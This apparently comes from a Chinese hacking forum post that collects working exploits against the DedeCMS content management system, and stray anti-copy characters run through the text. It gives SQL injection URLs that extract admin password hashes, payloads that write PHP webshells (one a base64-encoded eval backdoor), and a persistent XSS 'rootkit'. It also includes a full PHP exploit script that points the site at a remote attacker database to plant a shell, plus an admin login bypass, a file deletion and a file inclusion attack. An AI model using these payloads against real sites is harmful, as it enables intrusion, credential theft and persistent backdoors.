|
|
/ `2 \& Y7 j2 v% u
Dedecms 5.6 rss注入漏洞
5 }$ O4 Y; ~" V. ]- s3 ?" T" ~http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
+ N# W# H6 k% V |% m/ Y
! E3 B% u" z( k- b! |$ X1 j) h+ q) }+ f1 P9 R+ o# L G% }
6 C6 l0 a$ e0 W$ ~4 p
- r. `) o/ q/ K
/ w( m0 i8 M% ?$ w w1 [$ \: Q& n# O; C0 E: [& z" u. |+ P
8 P7 U: s3 }. v. ^, L
3 Y8 n3 i0 p0 tDedeCms v5.6 嵌入恶意代码执行漏洞
9 X$ b. _6 u0 R7 o% b1 d注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
; w6 Q5 c+ Q+ u- K发表后查看或修改即可执行
& T% Q5 Q6 g8 x- M! `: D6 va{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
! t5 n6 a* f" V- _6 @- Z; B生成x.php 密码xiao,直接生成一句话。( I* H& T [( C1 ^9 O( o! N2 p
. a" D& j6 A' M$ ~) ?9 {
$ t! m5 }& G a9 j8 G4 r! \; r: b3 s5 r% y# a3 S
" @9 U5 J' O5 a7 j* ? E, _1 R* @
: n! F/ V2 E0 n* V9 x* x* s6 y% ?0 `4 E @3 e) l( p
+ B# S1 v ^' u' N, a- _
Dede 5.6 GBK SQL注入漏洞/ h: u; g8 q0 K: D5 M9 y) Y4 w& g4 b
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';9 t, Q8 x/ `' y8 C( H% i7 w
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
7 J8 T6 x% H$ _- J3 ihttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7. j4 A% O7 O- X1 _' S7 F$ Q
+ q* S! b1 ^3 W1 b1 g5 e
- S: L" D/ s- ^$ h7 m# F* m4 x
' E7 B1 |7 e; T1 r( Z" w- P
; F' c3 k8 ~3 }3 q/ a! p# g
. |: w! D/ L) o9 k2 }0 H% c0 N& q3 a8 Z: S- [6 T, U
+ D& a: F4 L" v: L4 N
) H& Y2 d% P0 z# UDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
4 r, I7 x- N- ~# ?' p1 V5 dhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 0 M' M, I* w2 C* N ]5 [
# {4 B# s v+ H* e+ f. [
" `# p$ H. P. G% b
' A$ _, x; ?$ z I+ S9 N
( C$ p5 t2 d: g7 l8 q! X
2 W& _# o4 J" a; L7 v
5 x2 D: m3 i; Q \2 aDEDECMS 全版本 gotopage变量XSS漏洞: R! j, R5 m, M3 I: V9 ^
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ! Z4 M w4 _' ?+ Z( D3 \8 x
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="5 O. }+ U8 r6 C( T: J% b. z, {
0 a5 n% c# X* M. P$ d9 t
3 j9 O ^5 {) h2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
) a) ~: {! c$ B) v. D) zhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda& b; U+ G$ w$ z2 I
1 q0 k9 w- d7 C, L0 W2 r. |4 U) U. w t N$ E
http://v57.demo.dedecms.com/dede/login.php' H5 j& J: m' d: J
" V( C+ C" A8 f5 C% k& A+ X: c& B5 C- B+ X" |
color=Red]DeDeCMS(织梦)变量覆盖getshell2 u, Q& K; w3 _2 S" t' N* \2 o
#!usr/bin/php -w
. b* r% N, P# b& U* C<?php, v, N, w+ m5 F7 A3 V
error_reporting(E_ERROR);( I4 M& s; R& L7 y, ]! Q! ?
set_time_limit(0);
: {# H# E7 A( Tprint_r('' Y1 V+ n- E4 U; i/ U% k3 M9 G" Z
DEDEcms Variable Coverage8 x, F' A; R* W4 p( d
Exploit Author: www.heixiaozi.comwww.webvul.com
; ?% R' A7 H1 l) z( u);7 o9 j# I7 p, Y' S7 h1 L
echo "\r\n";/ e! F1 q: |4 I* O+ r; \3 @
if($argv[2]==null){. y* M7 b$ O3 S, j* d
print_r('& T1 H3 T2 R" @$ i( Q7 Q. t, h
+---------------------------------------------------------------------------+9 U' W2 ~! S% o" W; I
Usage: php '.$argv[0].' url aid path
$ E& ^: i- ~1 ]: z/ c" r% b' Raid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/) \+ @% }! p- k4 \5 O" X5 U
Example:4 v0 f" B# G2 ^! U$ Q& g3 c
php '.$argv[0].' www.site.com 1 old
* ^5 ^; i2 D! A v+---------------------------------------------------------------------------+- P y1 E; q4 ?0 G7 x8 S- O* q" H. Y4 z5 h
');: w$ p$ ?+ S' T2 L; p. c
exit;
* g1 O3 J, o3 [* `9 e$ f}
' S) z7 s9 L" Z& s$url=$argv[1];
, b4 [$ B* O- p" Y$ w; ^- d& g7 g$aid=$argv[2];& e. w5 I3 P2 g' z# V
$path=$argv[3];
3 \6 P: m' Z& M% O+ ^: Z3 L$exp=Getshell($url,$aid,$path);- D0 e4 K' D; w* z/ l
if (strpos($exp,"OK")>12){
6 s% V- T! Y- s, ?% R( r* H( h8 uecho "
t$ M+ y/ \! G( nExploit Success \n";
, ]2 v7 I) i7 H- tif($aid==1)echo "9 \3 I7 ~7 e. F; }! Q2 v
Shell:".$url."/$path/data/cache/fuck.php\n" ;
: C! K% A, p$ H/ h- `% E/ e6 o3 h
; g9 @4 Y: Z6 M$ u7 F
if($aid==2)echo "
" l7 d. s( n7 l6 I: wShell:".$url."/$path/fuck.php\n" ;
f8 e2 v/ \( U" h9 B1 y) A' Z' n# b/ I
( A0 j2 k8 l* _, o( i
if($aid==3)echo "
' I% Q; _ S4 j* u' W. x- DShell:".$url."/$path/plus/fuck.php\n";
8 h4 H) g5 J; ?$ n) M+ M) ?. x
* M+ ]1 t, x* T
}else{! S2 ?! T% K4 Y* j: y) ?
echo "
0 D) `4 J5 ~" u( B! X6 `/ Y$ b7 wExploit Failed \n";
g3 g) p0 Q, u2 Q: G' o}
+ ^* e7 r% o! d6 A) E" @ L) }function Getshell($url,$aid,$path){
3 p8 p! G% H; }0 ~$id=$aid;
7 \3 v" q' \5 |/ I6 P$host=$url;( O2 f- s( j9 P9 t
$port="80";
! ~. J+ A; b; a# x: l ^$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";8 Y3 L2 v- w. d1 ~2 r' K% T9 S
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
# E! C; L4 E A. _# d& x' S% w$data .= "Host: ".$host."\r\n";
2 E/ U/ R3 v; P$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";& ^' s' [3 g; N- T
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";' V5 ?5 m2 p0 o+ V: G# b$ l7 _
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";, R/ Z3 p' k6 L- R. t
//$data .= "Accept-Encoding: gzip,deflate\r\n";1 u+ i7 u9 e/ V5 o( k+ z
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";0 J+ d! d+ ^' O: r: n8 ^1 p7 `- L
$data .= "Connection: keep-alive\r\n";2 `2 G8 ^9 `& n4 @* K. g8 P! [
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";+ C! V( c/ R; G6 T. y
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
% K7 m' h9 Y: D X" P$data .= $content."\r\n";
3 o0 }& j5 Z- x- i" ?$ock=fsockopen($host,$port);( i1 A9 p E& U' ]. t6 t; ^
if (!$ock) {
! p5 [) b: O* }6 M4 ?echo "+ F- f5 b+ s4 T4 g6 U9 _
No response from ".$host."\n";
- x3 [! t" R) L}
2 ]2 w& h5 A; r# R3 @# Tfwrite($ock,$data);! Q- Z0 y; p0 w
while (!feof($ock)) {' y x, t+ i( T
$exp=fgets($ock, 1024);
& E* U/ U& C4 _& r( q* hreturn $exp;! z j$ M$ {, H. q, `* ]% I
}2 p5 I2 p4 u$ J2 H) i# L
}
4 w# ?: d* g2 ?! H2 A# C3 I @" A* X, V/ t' i* @( J
, s' h4 D& {) x6 A: P
?>; w' V% U& E! C) u- L) n7 u
' w& L- q/ L/ ~5 x* t/ N$ F
) j# @1 M8 x7 S7 R1 c
# u2 z3 t# d' h. t) ?8 M: u0 S
7 B. B) w1 @% R+ D
: v5 }7 A7 N2 l- T+ A+ C* S! y
K! J3 Y% [2 }0 \+ k
8 E p# k( n$ t A |2 Z
; F" a1 |& O- i W" u
1 P c6 ~' B9 `9 D }
5 Z8 D) Q `: q, q" m' L+ ^. EDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)8 c2 Z2 K5 q' w; J q* |
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root* n$ `4 I# k7 E5 D3 ]; c
+ ^0 L1 D* V- |7 H- g! x* U8 f6 c9 |( K: A1 ^
把上面validate=dcug改为当前的验证码,即可直接进入网站后台6 P( d8 L0 t2 ~" ?* [ z" X9 q
) C9 K% d5 s6 _0 y% G" s% {; s/ k; |* X; _+ F
此漏洞的前提是必须得到后台路径才能实现
, E" }- @* K& c' G3 c$ c8 h( L6 d; Z) }( g( R) v
) E5 B7 d& J: C8 ]& ~+ H2 a/ t5 W
7 `( T5 B+ M4 N& `# H
+ m3 t6 ~* y+ ~- F9 S1 \5 w u: w! S% B7 n0 ?
) G2 d i p: m9 |& K
! x, E9 J9 { Z
7 P& K* I9 N4 p3 p( N
3 J5 C$ R7 B8 e" j
# d4 q3 b+ E1 C# H) {( m6 JDedecms织梦 标签远程文件写入漏洞( ^9 p( @7 I: G7 {
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
& S, G7 T# e7 p2 g8 x8 |
4 X0 Q2 y, \3 _: _8 H W6 _+ k# |% l) x$ O- b# \$ R/ Q* H
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 2 x/ Z$ z) i1 N9 V* h* r! Q6 e
<form action="" method="post" name="QuickSearch" id="QuickSearch">0 R' Q8 S# ?0 r- A
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
( B! N r4 l) N3 S<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />2 b$ ]) B% R. s
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />0 D) V9 k+ A, \( H6 K
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
/ n5 I2 @2 J4 H6 I<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
. X# |+ {$ e" G, D<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; @. h6 K: ^: h$ ^+ K0 S<input type="text" value="true" name="nocache" style="width:400">
$ N }. a- c/ B4 O0 E<input type="submit" value="提交" name="QuickSearchBtn"><br />1 D K. V7 r4 z3 q8 d2 ~( M/ f7 v
</form>' X' U/ m% \% p, a
<script>6 V* H( ]& F( d! U
function addaction()
& w: U T# h+ v$ V7 h# P0 o+ m4 w4 X% u{
( J$ k5 D! j7 Rdocument.QuickSearch.action=document.QuickSearch.doaction.value;" s$ ~6 _. z+ G: R
}9 ]/ E9 i3 j! i& l) e3 ^/ }
</script>
8 ~- i5 h; B& R$ B0 y$ E% b$ c
. h* x: q3 z* i2 b1 S4 u0 |# k. R" o! s
: q2 l7 F7 t$ I5 l% J
) Q3 y$ i: S0 Y* v/ `5 T
5 D3 c7 D& {2 y' g3 X( Y9 k! y# y
; O7 X _8 h& O% U2 l$ C% b0 T3 ^; u" @) z. K: Z
$ ~& E! G. [+ z1 V- [8 b! j
2 b( p) ?) |/ u/ r! l) y* @3 a
$ f' [2 ^! z0 s+ z1 \8 I( _) MDedeCms v5.6 嵌入恶意代码执行漏洞2 `% M! y; o# U1 g, l' x; I, ]
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行; {0 S2 E: n5 H' @$ z% `3 B7 h
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
- c" u/ M6 m/ T7 [ ]5 {生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
1 P% Z h3 n' W# W9 n7 [Dedecms <= V5.6 Final模板执行漏洞
, Q9 H0 v# m0 u l注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:! C7 X7 Y# T- E/ B0 n/ G
uploads/userup/2/12OMX04-15A.jpg
* `) `; k* p) j4 Z; U' Y( K7 p; d0 e$ N1 t
4 @6 f6 k$ U9 f N2 L* E3 ]! ~# |* r2 X模板内容是(如果限制图片格式,加gif89a):
3 ^# G, J4 A, V8 U2 ~{dede:name runphp='yes'}
. {. S; |, X8 ?+ p$fp = @fopen("1.php", 'a');: R* R! }% q1 R2 N* q6 r
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
/ E' o7 x8 {+ n( ?% x@fclose($fp);
, i6 z# A3 T" O4 ?. Q- P{/dede:name}
! x& G# Z# Z' s, M6 s$ v+ V7 K% b2 修改刚刚发表的文章,查看源文件,构造一个表单:/ P; V8 F# R6 _) S6 K$ y
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">6 _1 f! T$ u, c" V2 u
<input type="hidden" name="dopost" value="save" />6 x+ i3 y- L8 c: U; K
<input type="hidden" name="aid" value="2" />
! }3 b7 x& V5 Z<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />0 e& |1 p8 m7 F. B0 t: J
<input type="hidden" name="channelid" value="1" />
0 g2 y5 K1 e& K% U2 d# ^; e<input type="hidden" name="oldlitpic" value="" />
! q6 C* c, F- G9 k<input type="hidden" name="sortrank" value="1275972263" />4 J; V% M6 ?: z. q* _2 x. d
& x! e0 |3 b% j) P9 j: m/ i
2 Z0 `/ Y l+ x<div id="mainCp">
+ F7 Z* B7 q- }& r- d' Y" O$ }# e, d<h3 class="meTitle"><strong>修改文章</strong></h3>
$ S8 [- T3 W4 J* b0 S! I' a3 [9 p5 G& l; Q) h
T$ E, l& ?% ]' c<div class="postForm">
+ p- B x3 ~/ Y# D9 F/ Q v+ g0 g) a<label>标题:</label>
8 E7 J( |3 ^8 w/ H<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>% t: u; S: C9 M% P
' e: ^/ K5 U) q; v3 m
: x h6 r* w6 R<label>标签TAG:</label>
0 T/ O( P" J, V; x, z<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
) Y6 h! i X0 z) x. O
4 |- @$ }. h3 j! I3 s7 R
( r& o! s5 g: I2 y: {<label>作者:</label>- u0 x0 n1 j/ V9 Q( l- h
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
8 J5 x4 A7 Z3 O& e* L0 ]) w1 l' r8 |+ |4 [# w
2 a' G: D( I9 ]5 P<label>隶属栏目:</label>
9 I) m) B/ N) F; U1 M<select name='typeid' size='1'>" A# c- t0 F$ J/ P# H8 y
<option value='1' class='option3' selected=''>测试栏目</option>
: i/ ?6 _5 z: `9 R; }</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)2 f7 i7 t- c* v; s# |5 \
# p$ \) @8 z6 ?' m- J/ M1 P! l
! r! b2 c9 Z9 n: l% i+ E<label>我的分类:</label>, M$ f7 V! w3 I3 N S! q& p+ ]6 `
<select name='mtypesid' size='1'>. M' D0 l: X- n' q$ F
<option value='0' selected>请选择分类...</option>5 s6 h& i- y D
<option value='1' class='option3' selected>hahahha</option>
- Y, i. x0 ^: S. B1 |* ?</select>
8 b$ c/ m% S' r6 C2 u- V! \ d% o/ r# i( @
4 S% n& r. l, \% ^7 V$ H
<label>信息摘要:</label>
% U* F1 O% j3 @- C& G) Z' z* Y<textarea name="description" id="description">1111111</textarea>
+ \4 e* A) B! v8 q# I: Q* S9 X' U, g) s(内容的简要说明)
1 w/ k( c9 l. k9 s: G1 I
' x5 [, ^4 O7 ^! c' H+ b) d" {1 R& {0 j8 N3 b4 b/ F: \1 p
<label>缩略图:</label>& S/ y/ H6 D; V6 Y4 h5 R
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>6 O) G, {; i! [& L
6 E: P( C; U" n. m. z9 X4 _! L% J/ Y" r; L3 R G; h V
<input type='text' name='templet'
/ K H( @7 ?" Uvalue="../ uploads/userup/2/12OMX04-15A.jpg">
: I' ]0 w" b% |3 ]' y" u0 y0 z<input type='text' name='dede_addonfields', Y; I+ J& y7 l: ~- R
value="templet,htmltext;">(这里构造)
, \! V! b* C6 H: M. Z</div>/ s% W3 B% [; a# X( I; b
& s1 T& Q1 E! r# X9 Q
& g6 a2 p; k2 ?/ n- C6 O<!-- 表单操作区域 -->
" N% l l' O# i' ?. `% q$ i<h3 class="meTitle">详细内容</h3>& ~! A- U: ~- K1 Z! m
: t% {5 ^: n, y$ L
5 b6 y- i" V1 k( k' V& ?<div class="contentShow postForm">! u- r# X5 B; N& x, M" S0 I6 c f
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>3 p. g1 O% U# j& }* ~; _
4 }' s, e4 n1 K5 j* ~$ j( @
- W8 Q1 t9 x, S, l
<label>验证码:</label>6 e0 {' q: Y. }3 e, H
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />+ }9 z2 Y3 r% `6 ]) m
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
& Z. z% I. ?2 j! H* Q: _- Q" P
e+ W! H3 s: D5 W8 y6 @' l
: H* I3 m* \# ] ~<button class="button2" type="submit">提交</button>
+ q/ k* X& P. u9 R<button class="button2 ml10" type="reset">重置</button>; W3 i k% \8 x
</div>" r S- [6 B, |" m, O3 R
4 |: Z- y- k1 y' M4 C' D% F2 e4 ?1 M$ o+ Z9 X d& Z% ?9 J& y" Y
</div>4 f9 ]8 \, Q" ]& N
( i9 ?0 Q. f. I$ T/ I4 c
3 |% M# p3 Q1 }</form>
4 S O& N1 m0 \! Q; g
( g4 @0 r0 D2 `+ d* z! c; k5 R: ]9 ~/ l" F$ W' l& m ?( K
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:$ |3 W" R6 ?; @5 I
假设刚刚修改的文章的aid为2,则我们只需要访问:
; t' J8 b& c4 _+ |http://127.0.0.1/dede/plus/view.php?aid=21 U# c3 T' I) q: Z
即可以在plus目录下生成webshell:1.php- q; B% o8 E& T8 @! F1 ]3 l M
2 M9 Q7 c4 M4 M- C& j2 M: T% U3 }% D j" Q1 E
5 H! @, v$ y: Q1 a
0 H2 o h: ~# f) h: Z1 L; G1 W
1 y, i" E! Y/ ~& F9 A; m. t6 j9 n, i' i7 u3 t4 m
, s6 t: _( i; \/ X- ~: _
! P) t# J5 J1 o0 V# Z5 V) A$ W1 d5 O2 u6 R. T) }
9 C$ \) ^+ z, \8 H# F( H+ a/ G
' ]4 g1 p p2 P8 ]+ E' x
8 V# c+ `. R4 U+ P' A/ P) a
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
+ X9 P- }5 m. s3 [; tGif89a{dede:field name='toby57' runphp='yes'}( t% A$ N, Q% B' L0 z" d8 k
phpinfo();
2 {+ k' k w, E{/dede:field}2 h1 r0 c3 G. e/ G
保存为1.gif
( p( O. h5 G& u2 s5 G3 S<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
. ^3 [- ?8 X( [, e4 y<input type="hidden" name="aid" value="7" /> ; B' Z5 G4 d! i! M) ^: g! M; h6 L( A
<input type="hidden" name="mediatype" value="1" />
# u* P. ~$ _( B0 y1 {1 D7 W<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
7 @; \6 j( H1 x) }: ]2 p4 Z6 O<input type="hidden" name="dopost" value="save" /> 4 g! b" H4 H7 T1 q
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
/ x: r% @0 }" s<input name="addonfile" type="file" id="addonfile"/> ! r9 H% l- O# R% b
<button class="button2" type="submit" >更改</button>
1 y) o! s6 ^8 p4 P+ S" w+ D& z8 x9 o</form> 3 p8 v1 f" p2 T% B/ `, y7 ]
. q3 O7 B9 C) A; J$ Q8 D. Y9 ?" n" Y) \
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
. H! Z+ p4 y! O! J9 ~发表文章,然后构造修改表单如下:
% {! S( Z- ?# V6 M4 p; D& @8 ~
. A% p; D' B/ G6 f+ B3 P( o5 e+ T/ |" ~* |* R: N
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
9 Q0 I6 Y! w+ F" e7 v' t0 i, A$ t+ u<input type="hidden" name="dopost" value="save" />
7 Z) x! l# C. `0 d7 g<input type="hidden" name="aid" value="2" />
5 ?6 `. |) I4 Z. l0 T/ Q* j<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
( B4 s! X& J7 T+ Q7 Q<input type="hidden" name="channelid" value="1" /> # s! u. A4 M# k! I( \( z) z
<input type="hidden" name="oldlitpic" value="" /> * a- x) ^( F. k# k+ m( d
<input type="hidden" name="sortrank" value="1282049150" /> " O: K" F/ [4 D; j/ A
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> u8 w1 \$ N$ M; Q `
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 0 y$ S8 ]8 c# v2 Q1 V" w
<select name='typeid' size='1'> ! y7 l" ~+ X; Z9 \$ n
<option value='1' class='option3' selected=''>Test</option> + W) J5 I. X O) `8 D( u
<select name='mtypesid' size='1'>
3 g% u9 V% x( T3 T<option value='0' selected>请选择分类...</option>
# W) X9 N+ H5 s1 S<option value='1' class='option3' selected>aa</option></select>
( V/ \( o+ W- a<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 6 z) ^; J+ c a' @! ]. T
<input type='hidden' name='dede_addonfields' value="templet"> # {+ D! S. b* ^
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> ' x1 E. [2 ~- d3 L/ _; e' p5 B
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ! I4 Z/ z4 G# g" a
<button class="button2" type="submit">提交</button> - e( E( \' z {. v9 }1 z \# s
</form>
! J& Q% e5 {+ y7 h" L$ b
; o5 X3 M- V& v! R" o: u0 X1 }5 a# F4 S, w& h6 J& ?$ R
# f1 e$ T( ~% n/ N/ P2 N
7 w7 T3 T) Y: ~# Y. S' S0 V
/ _/ J7 c2 {, _$ ?* s/ T, ~" X2 y& U0 @7 Z0 i1 H
; b$ ^* D4 T( m1 h
( r% K* ?- s, v2 k& }: P' L$ I- b9 u. U; c/ e
7 K( m# d' Y' x$ h+ Q: [2 I' G+ b6 S8 n$ J q5 f8 Z
7 R' e+ K% U7 T, q0 {! n9 K
织梦(Dedecms)V5.6 远程文件删除漏洞
# y* `5 A' H# @ Jhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
9 O2 ~3 G- r0 y/ T- ? }: a
8 `6 L* V4 d5 R" S! d. E" S
$ I2 j0 D, D* F9 s! R
% H9 ?. S6 a: d ~, B5 ^* g; I T8 K
! o2 x2 N# P1 M) n
" u O, C% u( U* L" Z
6 x6 s6 n/ Y2 Z5 k5 m1 u
' k% p) f# P4 `# s- w3 a2 \5 _7 x0 ~( u- H8 z
7 ]3 y; V0 s. N% O0 h/ W
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 # D, e6 t% ?3 M3 W+ `
http://www.test.com/plus/carbuya ... urn&code=../../
% }- G' s" }# a) [ w; I6 R7 @: A# t4 b) D* @+ a7 D
# m, d: u1 {6 O, d, ]! u+ {$ a9 k/ }* C5 a- l# }6 j
1 G7 ~' x* }. H$ l2 @# I, a5 x
7 U0 A% ?: a- e* x
4 L. @6 p% J# w/ x0 s3 D) }
& S3 b+ F( B9 A8 \; C. {+ ?- [# g1 `7 c) A3 j( M
9 J5 s, t& e$ O7 o @# \
9 T; d4 x* a* K1 O: T
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 8 y! \6 c7 m* l- ^. z _
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
8 ^8 z* K3 k P) I8 R0 Q8 I# L密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
4 p) F* s2 C( X* R5 j0 ^, b3 z3 K) Q0 ~7 U
. @, ~' g1 ~& X/ B4 s1 |! r- n6 l4 L5 m A e
! E% \% v- [! ^9 O' [9 Y+ Q
0 U! b! ~: j4 E, { {, ~5 v8 E# e. q6 | X# Y$ ~7 j
; P" X) ?! ]9 |9 \* {
" r+ W: P" `1 t$ P7 k. i) ?
6 O b+ Q6 D) R1 ]0 p, L
! \ M8 F$ u1 D* \( n* U! X" M织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
# {# P& n( `: ~4 T0 }http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
, m" B4 a5 E6 Y! f( b6 l+ J, O L/ B6 [" n
$ K6 p- B+ _3 a5 _3 D2 \4 A
. r% b8 I3 R2 Y; W: g9 F" p. H) p: g! q$ F4 D& P0 ?
6 R% q$ ]" |: e X
' K+ d( C- e4 j8 W# o. ]8 P4 D3 [* g0 j
3 ^& U4 j" \* p" I* u0 E* t$ c
2 k1 L1 {. S- s# h6 o
- O3 I' E. l, k6 T$ e$ k
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞) z& Q; a. G, g
